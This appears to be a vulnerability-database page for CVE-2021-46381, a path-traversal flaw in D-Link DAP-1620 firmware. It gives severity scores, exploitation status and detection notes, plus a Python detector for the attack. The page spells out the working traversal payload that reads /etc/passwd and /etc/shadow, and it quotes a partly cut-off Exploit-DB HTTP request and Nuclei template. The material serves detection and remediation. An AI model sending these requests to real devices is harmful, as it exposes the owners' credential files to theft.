CVE-2021-46381
Published 2022-03-04
CVE-2021-46381: Local File Inclusion due to path traversal in D-Link DAP-1620 leads to unauthorized internal files reading [/etc/passwd] and [/etc/shadow].
Priority P1 · 80 · high · 7.5 (CVSS 3.1)
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
ITW · EXPLOIT · VulnCheck KEV · Initial access
Exploited in the wild
EPSS: 57.98% (99.0th percentile)
Detection & IOCs
command: action=do_graph_auth&graph_code=94102&html_response_message=just_login&html_response_page=../../../../../../../../../../../../../../etc/passwd&log_pass=DummyPass&login_n=admin&login_name=DummyName&tkn=634855349&tmp_log_pass=DummyPass&tmp_log_pass_auth=DummyPass
yara regex: root:.*:0:0:
bytes:
490a0046304402202af690770e9006f89e4de84567b484857812d481914449434b5245491daa68e202207f835a7d797095a8e3434d1cb6bf9526da49ff2771af10273bf0307896894b58:922c64590222798bb761d5b6d8e72950
- Exploit targets POST /apply.cgi with action=do_graph_auth and a path-traversal sequence in the html_response_page parameter to read /etc/passwd or /etc/shadow.
- Successful exploitation returns content matching 'root:.*:0:0:' in the HTTP response body, indicating /etc/passwd was read.
- Monitor for POST requests to /apply.cgi containing '../' sequences in the html_response_page parameter, targeting /etc/passwd or /etc/shadow.
- The exploit was tested specifically against D-Link DAP-1620 A1 hardware revision running firmware v1.01; other revisions or firmware versions may not be vulnerable.
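The monitoring rule in the notes above, sketched as an added example that is not part of the advisory sources aggregated on this page: it classifies a captured request/response pair as no match, an attempt, or a successful read. The sample records (including the `login_fail.asp` value) are constructed, and the handling of repeated percent-encoding is an assumption that goes beyond the literal `../` case the page describes.

```python
import re
from urllib.parse import parse_qs, unquote

PASSWD_RE = re.compile(r"root:.*:0:0:")               # response marker quoted on the page
TRAVERSAL_RE = re.compile(r"(^|[\\/])\.\.([\\/]|$)")  # a ".." path segment

def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding (%252e%252e -> ..), bounded to avoid loops."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(method, path, body, response_body=""):
    """Return 'none', 'attempt' or 'success' for one request/response pair."""
    if method.upper() != "POST" or path.split("?", 1)[0] != "/apply.cgi":
        return "none"
    # parse_qs decodes once; fully_decode catches double-encoded values.
    params = parse_qs(body, keep_blank_values=True)
    pages = [fully_decode(v) for v in params.get("html_response_page", [])]
    if not any(TRAVERSAL_RE.search(p) for p in pages):
        return "none"
    # A passwd-style root entry in the response means the file was returned.
    return "success" if PASSWD_RE.search(response_body) else "attempt"

# Constructed sample records: (method, path, request body, response body).
SAMPLES = [
    ("POST", "/apply.cgi",
     "action=do_graph_auth&html_response_page=login_fail.asp&login_name=admin",
     "<html>login failed</html>"),
    ("POST", "/apply.cgi",
     "action=do_graph_auth&html_response_page=../../../../etc/passwd",
     "root:x:0:0:root:/root:/bin/sh\n"),
    ("POST", "/apply.cgi",
     "action=do_graph_auth&html_response_page="
     "%252e%252e%252f%252e%252e%252fetc%252fshadow",
     ""),
    ("GET", "/apply.cgi", "", ""),
]

def scan(records):
    """Classify every record, preserving input order."""
    return [classify(*record) for record in records]

if __name__ == "__main__":
    for record, verdict in zip(SAMPLES, scan(SAMPLES)):
        print(verdict, record[0], record[1], record[2][:60])
```
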
CVSS provenance
nvd · v3.1 · 7.5 · HIGH · CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvd · v2.0 · 5.0 · MEDIUM · AV:N/AC:L/Au:N/C:P/I:N/A:N
vulncheck · 7.5 · HIGH
GHSA
GHSA-xjh5-4xm7-v6pc: Local File Inclusion due to path traversal in D-Link DAP-1620 leads to unauthorized internal files reading [/etc/passwd] and [/etc/shadow]
ghsa_unreviewed·2022-03-05
CVE-2021-46381 [HIGH] CWE-22 GHSA-xjh5-4xm7-v6pc: Local File Inclusion due to path traversal in D-Link DAP-1620 leads to unauthorized internal files reading [/etc/passwd] and [/etc/shadow]
VulnCheck
D-Link dap-1620_firmware Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
vulncheck·2021·CVSS 7.5
CVE-2021-46381 [HIGH] D-Link dap-1620_firmware Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Affected: D-Link dap-1620_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-22&host_type=src&vulnerability=cve-2021-46381; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-23&host_type=src&vulnerability=cve-2021-46381; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/m
No detection rules found.
Exploit-DB
DLINK DAP-1620 A1 v1.01 - Directory Traversal
exploitdb·2022-05-11·CVSS 7.5
CVE-2021-46381 [HIGH] DLINK DAP-1620 A1 v1.01 - Directory Traversal
---
# Exploit Title: DLINK DAP-1620 A1 v1.01 - Directory Traversal
# Date: 27/4/2022
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: https://me.dlink.com/consumer
# Version: DAP-1620 - A1 v1.01
# Tested on: Linux
# CVE : CVE-2021-46381
POST /apply.cgi HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: http://84.217.16.220/
Cookie: ID=634855649
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Content-Length: 281
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36
Host: 84.217.16.220
Connection: Keep-alive
action=do_graph_auth&graph_code=94102&html_response_message=just_login&html_r
Nuclei
D-Link DAP-1620 - Local File Inclusion
nuclei·CVSS 7.5
CVE-2021-46381 [HIGH] D-Link DAP-1620 - Local File Inclusion
D-Link DAP-1620 is susceptible to local file Inclusion due to path traversal that can lead to unauthorized internal files reading [/etc/passwd] and [/etc/shadow].
Template:
id: CVE-2021-46381

info:
  name: D-Link DAP-1620 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: D-Link DAP-1620 is susceptible to local file Inclusion due to path traversal that can lead to unauthorized internal files reading [/etc/passwd] and [/etc/shadow].
  impact: |
    An attacker can exploit this vulnerability to access sensitive information, such as configuration files or credentials, leading to further compromise of the device or network.
  remediation: |
    Apply the latest firmware update provided by D-Link to fix the local file inclusion vulnerability.
  refere
http://packetstormsecurity.com/files/167070/DLINK-DAP-1620-A1-1.01-Directory-Traversal.html
https://drive.google.com/drive/folders/19OP09msw8l7CJ622nkvnvnt7EKun1eCG?usp=sharing
https://www.dlink.com/en/security-bulletin/